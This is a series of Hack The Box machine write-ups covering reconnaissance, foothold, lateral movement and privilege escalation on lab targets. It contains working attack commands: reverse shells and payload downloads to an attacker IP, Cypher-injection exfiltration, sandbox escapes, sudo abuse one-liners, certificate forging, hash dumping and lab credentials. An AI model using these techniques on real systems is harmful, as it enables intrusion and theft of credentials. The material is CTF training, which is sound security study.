And in turn used impacket-secretsdump to dump the hashes:

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -hashes lmhash:nthash

Shell as Administrator

I can now finally get the Administrator ticket and log in:

root.txt

HTB-Code

Maxim Andrei Koltypin — Thu, 10 Jul 2025 00:00:00 GMT

Scope:
10.10.11.62

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn code.htb

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    syn-ack Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-title: Python Code Editor
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

5000/TCP - HTTP

I tried to run a reverse shell right away but it would not let me:

I went ahead and created an account:

test
test

After a lot of trial and error I found that this nifty piece of code returned a different error:

print((()).__class__.__bases__[0].__subclasses__())

Naturally I was not going to go over it all by hand so I opened up caido to view the request differently:

So in order to quickly count it I inserted the response inside a response.txt file, and wrote a python script to go over the file and find popen:

import json
import re

with open('response.txt') as f:
    data = json.load(f)

output = data['output']

# Match whole class entry, not just class name
class_entries = re.findall(r"<class '([^']+)'>", output)

for idx, name in enumerate(class_entries):
    if 'popen' in name.lower():
        print(f'Found at index: {idx}')
        print(f'Class name: {name}')
        break
else:
    print('popen not found.')

This gave me the following output:

I tried it in the web app but it was off by 1:

raise Exception((()).__class__.__bases__[0].__subclasses__()[317].__name__)

Reverse Shell

Now I had to modify the payload in such a way that it would give me a reverse shell.

raise Exception(str((()) .__class__.__bases__[0].__subclasses__()[317](
    "bash -c 'busybox nc 10.10.14.17 80 -e bash'", shell=True, stdout=-1).communicate()))

I then clicked Run and checked my listener.

Foothold

Shell as app-production

I got a shell, let's start enum.

user.txt

Enumeration

martin
nafeelswordsmaster

Time to move laterally.

Lateral Movement

Privilege Escalation

Symlinks

So in order to steal all info from root we can use the following script:

# symlink script to steal everything from *root* and zip it up
cat > root-steal.json << EOF  
{  
"destination": "/home/martin/",  
"multiprocessing": true,  
"verbose_log": true,  
"directories_to_archive": [  
"/home/....//root/"  
]  
}  
EOF

As soon as we untar the folder we can access anything from root's directory:

root.txt

HTB-Nocturnal

Maxim Andrei Koltypin — Thu, 10 Jul 2025 00:00:00 GMT

Scope:
10.10.11.64

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn nocturnal.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Welcome to Nocturnal
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I registered an account as test - test123 and got the welcome screen:

I tried uploading a webshell and got this error:

I opened caido and started modifying the request:

I changed it to webshell.php.pdf:

I couldn't access the files however:

gobuster

I ran a gobuster scan to enumerate the endpoints:

In caido I noticed these requests:

ffuf

So I tried brute forcing any usernames:

ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=webshell.pdf' -w /usr/share/seclists/Usernames/statistically-likely-usernames/john.txt -fs 2985 -t 100 -H 'Cookie: PHPSESSID=4k0p6cgchd4dvfk8ubfjsnb8tj'

I added them all to a users.txt file for further brute forcing.

I then went on to manipulate the request with the found usernames and found this:

:::note The other users had no files. :::

amanda
arHkG7HAI68X8s1J

However I was not able to log in with this password:

Neither were any of the other 2 able to log in with this password:

This probably meant that I had to use these creds online:

I can create backups here:

Command Injection

However this didn't give me anything juicy, but viewing the request I saw a potential Command Injection vulnerability:

password=%0Abash%09-c%09"wget%0910.10.14.17/shell.php"%0A&backup=

password=%0Abash%09-c%09"php%09shell.php"%0A&backup=

Foothold

Shell as www-data

I then upgraded my shell to a penelope shell:

Here I found this db:

I went ahead and downloaded it so I could view it with sqlite3:

I went ahead and cracked them using crackstation:

I found a valid set:

tobias
slowmotionapocalypse

Lateral Movement

user.txt

Privilege Escalation

Enumeration

I started off with linpeas.sh:

:::note There's a bunch of ports open on localhost, I might have to check it out. :::

Port Forward

Let's check it out:

I tried to brute force the creds, and the following combo worked:

admin
slowmotionapocalypse

From the source code I can find the version:

Let's do some OSINT.

PoC -> root

I used the following poc:

root.txt

HTB-Dog

Maxim Andrei Koltypin — Fri, 11 Jul 2025 00:00:00 GMT

Scope:
10.10.11.58

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn dog.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply 
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password 
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-title: Home | Dog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I notice there's a .git repo found, let's check it out.

git-dumper

Using git log I notice only 1 commit:

Within settings.php I find a set of creds:

root
BackDropJ2024DS2024

:::note However root is not recognized as a username so it must be solely for mysql. :::

grep

In order to find the username amongst all the files I used:

grep -r dog.htb

This spat out the username, let's try it out.

80/TCP - HTTP

I got in with the combination of creds, let's check it out.

I notice a lot of user accounts:

I then found a way to add pages in Home -> Add Content:

I tried making a webshell out of a page:

Unfortunately this didn't work.

Instead I will try to upload it as a theme:

But I require an .info file:

I create my webshell.info file:

type = module
name = Block
description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.
package = Layouts
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x

configure = admin/structure/block

; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662

And bundle it with the webshell:

Now I upload it:

I can find it here:

Let's get a foothold.

Foothold

Shell as www-data

I then check whether mysql is open:

It is, let's try to access it.

mysql

I easily log in with the previous found creds:

root
BackDropJ2024DS2024

I went ahead and copied over john and jobert's hashes since these had a higher priority.

:::note Makes sense since Backdrop CMS is based on Drupal. :::

hash cracking - FAIL

This went on for way too long so I tried out john but that didn't give any result either:

I then just tried to password spray the previous found pass and it worked!

user.txt

Privilege Escalation

Bee binary

I went ahead and tried the binary to see what it does and found this:

I can thus use the following command:

sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash -p");'

And now I'm root.

root.txt

HTB-Cypher

Maxim Andrei Koltypin — Sat, 12 Jul 2025 00:00:00 GMT

Scope:
10.10.11.57

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn cypher.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: GRAPH ASM
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I went ahead and ran gobuster in the background.

I tried logging in with admin - admin:

In caido I noticed that the login request went through the /api endpoint:

In the meantime gobuster finished scanning:

I noticed some interesting endpoints, I started off with /testing:

I downloaded and unpacked the java archive:

I was able to find some versions:

Might come in handy.

Nothing really useful here either.

Cypher Injection

I tried fiddling around with the parameters, thinking that there might be a SQLi, but instead I found something new:

I looked this error up:

I'd not heard of Cypher Injection beforehand so this was interesting:

Scrolling down I find:

Combining this with what we find in the error we can form a payload as follows:

' OR 1=1 LOAD CSV FROM 'http://10.10.14.17/test='+h.value AS y RETURN ''//

John - FAIL

Unfortunately I cannot crack it:

Foothold

Cypher Injection -> RCE

Using the Cypher Injection vulnerability I started testing for SSRF:

I should now be able to tweak it in such a way that I could get a reverse shell out of it.

Using backticks I found out that I could inject and execute commands such as whoami and id:

{
  "username": "admin' RETURN h.value AS hash UNION CALL custom.getUrlStatusCode(\"http://10.10.14.17/`id`\") YIELD statusCode AS hash RETURN hash; //",
  "password": "admin"
}

Knowing that I had full RCE I could now issue a reverse shell command:

Now that I had a shell I started enumerating the target

Going into the ~ directory I found this:

cU4btyib.20xtCMCXkBmerhK

Hydra - Password Spray

A quick check at password respraying showed me that this password was reused by graphasm for ssh:

Lateral Movement

user.txt

Privilege Escalation

Enumeration

I ran the binary and saw this:

Combining it together with the --debug we can run the following command and get root.txt:

sudo /usr/local/bin/bbot -cy /root/root.txt --debug

root.txt

HTB-Certificate

Maxim Andrei Koltypin — Mon, 14 Jul 2025 00:00:00 GMT

Start 17:22 14-07-2025

Scope:
10.10.11.71

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn certificate.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Certificate | Your portal for certification
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-favicon: Unknown favicon MD5: FBA180716B304B231C4029637CCF6481
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-14 23:25:25Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-14T23:26:54+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-14T23:26:54+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
|_ssl-date: 2025-07-14T23:26:54+00:00; +8h00m00s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-14T23:26:54+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49691/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49713/tcp open  msrpc         syn-ack Microsoft Windows RPC
49722/tcp open  msrpc         syn-ack Microsoft Windows RPC
49748/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 50770/tcp): CLEAN (Timeout)
|   Check 2 (port 62565/tcp): CLEAN (Timeout)
|   Check 3 (port 43669/udp): CLEAN (Timeout)
|   Check 4 (port 52308/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-14T23:26:17
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s

80/TCP - HTTP

It's got a variety of pages with forms to test.

I tried sending a subscription mail and viewed the request:

I started testing for xss:

Nothing, I went and copied the request and let sqlmap run:

In the meantime gobuster found an absolute boatload of endpoints:

So I went on and tried registering an account:

Apparently test already exists? I filled in the same but for test2.

I went on and logged in:

I clicked on one of the courses in the dashboard which took me here:

Some courses however don't have an ID yet, simply because they don't exist:

It appears though that we can upload them:

I tried uploading a reverse shell:

Guess I'll have to improvise.

Foothold

Reverse Shell as xamppuser

I click on HERE and it takes me to the not_mal.pdf file:

But since I also added the mal/shell.php directory inside the zip, I can easily access it as follows:

:::fail I screwed up with my payload: :::

I used the ivan shell:

:::tip In order to not fuck something up and having to restart a shell, I got a double reverse shell to penelope: :::

Enumeration

I went over to the webroot:

MySQL

certificate_webapp_user
cert!f!c@teDBPWD

It appears that mysql is open as well:

I tried accessing it from kali:

But it just kept on hanging.

Instead I hopped on over to our target, which conveniently had the binary inside the C:\xampp\mysql\bin directory:

Since it yet again was not interactive I had to issue commands like above.

Luckily enough we can easily guess the correct table that we're looking for.

.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -e 'use certificate_webapp_db;SELECT * FROM users;'

Sara.B matched so I had to crack her password.

Sara.b
Blink182

By spraying the creds I found that I had winrm access with Sara.B:

Lateral Movement

Now that I had a valid set of creds and a good foothold I could start moving up.

A .pcap file? Let's check it out!

Wireshark

I opened up wireshark and started analysing:

We can look for kerberos authentication here:

While we see parts of it, it is not enough to decipher it:

While the first one looked promising, it happened to be really dated.

Instead I opted for the GitHub one.

I played around with it and was easily able to retrieve some goodies:

as_req cracking

Using it we found the following password set:

Lion.SK
!QAZ2wsx

BloodHound

I notice that I'm part of the Remote Management Group so I go ahead and log in:

user.txt

And of course our privs are dogshit:

Unfortunately bloodhound didn't offer up any other interesting info either.

ESC3

Certipy-ad

Using the following command I checked for whatever vulnerabilities this domain might have:

certipy-ad find -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -stdout -vulnerable -dc-ip 10.10.11.71

I checked my mindmap and found the next steps:

I'll be targeting this template:

The command will thus look as follows:

certipy-ad req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -template 'Delegated-CRA' -dc-ip 10.10.11.71 -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA'

Next up we will be targeting ryan.k:

certipy-ad req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -template 'SignedUser' -dc-ip 10.10.11.71 -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA' -pfx lion.sk.pfx -on-behalf-of 'CERTIFICATE\ryan.k'

TGT

certipy-ad auth -pfx ryan.k.pfx -dc-ip 10.10.11.71

Privilege Escalation

SeManageVolumePrivilege

Final stretch, this one is actually quite neat, I've already had the pleasure of doing it once before in [[Access#SeManageVolumePrivilege]].

I go ahead and upload this tool:

:::note Doing it the dll route didn't work, Defender instantly flagged it. :::

I'll now create a temp directory:

Exporting Certificate

Now I will have to execute the following to export my certificate:

certutil -Store My

Next up:

certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca Certificate-LTD-CA.pfx

Forging Administrator Certificate

Upon download I can now use certipy-ad to forge a certificate for Administrator which I will in turn use to log in and take over their account.

certipy-ad forge -ca-pfx Certificate-LTD-CA.pfx -upn 'Administrator@certificate.htb' -out admin.pfx

Persistence

I then go ahead and change the password so I can keep my backdoor:

certipy-ad auth -pfx admin.pfx -username 'Administrator' -dc-ip 10.10.11.71 -domain certificate.htb -ldap-shell

root.txt

HTB-Outbound

Maxim Andrei Koltypin — Mon, 14 Jul 2025 00:00:00 GMT

Scope:
10.10.11.77

Creds:
tyler / LhKL1o9Nm3X2

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn outbound.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I checked for other subdomains but no hits:

80/TCP - HTTP

Here we can easily log in with the provided creds:

Scrolling around I manage to find the version:

CVE-2025-49113 - Authenticated RCE

Apparently the exploit lies in this piece of code:

Scrolling further down we can find the PoC:

We can't just get traditional reverse shell right away, instead it's limited RCE:

Foothold

Shell as www-data

I was able to get a full-on reverse shell using the following method:

Time for some enum:

I downloaded over linpeas.sh to speed up my enum.

mysql is open and running.

roundcube
RCDBPass2025

MySQL

Lateral Movement - Tyler

Eventually I figured to respray the password and got access as tyler using su:

:::note After being stuck for a while I returned to mysql and found that I needed to decypher the session: :::

Return to MySQL

From here we can decipher the text:

And now I can use the /var/www/html/roundcube/decrypt.sh script to decipher that one:

Lateral Movement - Jacob

We can now return back to the web service again to log in there:

jacob
gY4Wr3a1evp4

We can use these creds to login to ssh for real this time:

user.txt

Privilege Escalation

CVE-2025-27591 - Below

So we have sudo -l privs for the following:

Luckily for us someone's already made a PoC for getting root -> https://github.com/BridgerAlderson/CVE-2025-27591-PoC?tab=readme-ov-file

Super duper easy!

root.txt

---=

HTB-Eureka

Maxim Andrei Koltypin — Tue, 15 Jul 2025 00:00:00 GMT

Scope:
10.10.11.66

Recon

Nmap

sudo nmap -sV -sT -sC -p- -vvvv -T5 --min-rate=5000 eureka.htb

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://furni.htb/
8761/tcp open  http    syn-ack Apache Tomcat (language: en)
| http-auth: 
| HTTP/1.1 401 \x0D
|_  Basic realm=Realm
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nuclei

I went ahead and ran nuclei in order to enumerate the vulnerabilities:

http://furni.htb/actuator/heapdump

The above actuator jumps out as critical. The heap dump can expose credentials, tokens, secrets, and application internals.

JDumpSpider

To extract the heapdump we can use the jdumpspider.

I head on over to the releases and download the most recent one:

I download the heapdump:

Now I run the script against the heapdump file:

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

This gives us a set of creds:

oscar190
0sc@r190_S0l!dP@sswd

:::note This also appears to be the mysql creds: :::

80/TCP - HTTP

I use the found creds to log in:

However this just gave me an error:

Foothold

Shell as oscar190

Turns out these creds are valid for ssh:

I started enumerating the target.

8761/TCP - Eureka Server

So what now?

Turns out there's more interesting ports running on localhost.

And by using the strings command on the heapdump we can extract even another set of creds:

EurekaSrvr
0scarPWDisTheB3st

Using these creds I can log into 8761:

So... WTF is Eureka Server???

I started reading this article.

Scrolling further down:

We can essentially fake it by sending the following request and overwriting it:

curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@240.0.0.1:8761/eureka/apps/USER-MANAGEMENT-SERVICE  -H 'Content-Type: application/json' -d '{ 
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "10.10.14.17",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "10.10.14.17",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": {   
      "$": 8081,
      "@enabled": "true"
    },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}
'

:::important But in order to communicate with the server we will first have to port forward in order to reach the localhost :::

Port Forward

Accordingly I sent the above request:

miranda.wise
IL%21veT0Be%26BeT0L0ve&

Lateral Movement

Got to tweak it around a little bit:

miranda-wise
IL!veT0Be&BeT0L0ve

user.txt

So what's next?

Clearly this isn't the move here.

Privilege Escalation

pspy64

I ran pspy64 and found the following:

And when we check whether we can write to that file we see this:

Turns out we're part of the developers group, which has access to this directory.

So I can do this:

After waiting a while:

I can now go ahead and escalate the shell:

root.txt

HTB-Puppy

Maxim Andrei Koltypin — Tue, 15 Jul 2025 00:00:00 GMT

Scope:
10.10.11.70

Creds:
levi.james / KingofAkron2025!

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn puppy.htb 

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-15 13:50:31Z)
111/tcp   open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2049/tcp  open  nlockmgr      syn-ack 1-4 (RPC #100021)
3260/tcp  open  iscsi?        syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         syn-ack Microsoft Windows RPC
53828/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62785/tcp): CLEAN (Timeout)
|   Check 2 (port 57127/tcp): CLEAN (Timeout)
|   Check 3 (port 26380/udp): CLEAN (Timeout)
|   Check 4 (port 24379/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-07-15T13:52:19
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

NXC

I started password spraying to see what I could find

No interesting shares.

RPCclient

Other than that I couldn't find more useful stuff.

BloodHound

This part is interesting:

bloodyAD - GenericWrite

bloodyAD --host 10.10.11.70 --dc-ip PUPPY.HTB -u "levi.james" -p 'KingofAkron2025!' add groupMember DEVELOPERS 'levi.james'

Once part of this group I checked out the members and found this person:

As well as Adam.silver who's part of the Remote Management Group:

Anyways, I now of course had READ access to the DEV share:

SMBclient

I tried out keepass2john but it didn't work:

keepass4brute

Luckily enough the following script exists:

I download it and let it run:

keepassxc

I can now open the recovery.kdbx file as follows:

This was an absolute goldmine.

Time to abuse the GenericAll ACL.

bloodyAD - GenericAll

However I was not able to log in using evil-winrm:

This made sense when I password sprayed the creds:

Let's enable the account.

ldap

ldapsearch -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W -b "DC=puppy,DC=htb" "(sAMAccountName=ADAM.SILVER)"

We can modify it by creating a enable.ldif file then using ldap to change it.

dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 66048

ldapmodify -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W -f enable.ldif

When I now check it again it looks like this:

The account should now be enabled.

Foothold

Shell as adam.silver

Let's start enumerating the directory:

user.txt

Enumeration

Here I found the following:

Unfortunately it does not seem like steph.cooper is reusing his password for his adm account.

However after logging in and doing a dir -r -h scan I found this:

This looks like a dpapi creds file.

I then went ahead and transferred the files:

:::warning Simply using download via evil-winrm failed. :::

Privilege Escalation

impacket-dpapi

impacket-dpapi masterkey -f 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

And now for the credentials we will use the decrypted key:

impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9  -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

root.txt

HTB-Administrator

Maxim Andrei Koltypin — Mon, 15 Sep 2025 00:00:00 GMT

Scope:
10.10.11.42

Credentials:
Olivia
ichliebedich

Recon

Nmap

sudo nmap -sV -sC -sT -p- 10.10.11.42 -T5 --min-rate=5000 -vvvv -Pn

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-09-15 16:40:38Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49392/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49397/tcp open  msrpc         syn-ack Microsoft Windows RPC
49404/tcp open  msrpc         syn-ack Microsoft Windows RPC
49422/tcp open  msrpc         syn-ack Microsoft Windows RPC
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
63997/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

enum4linux

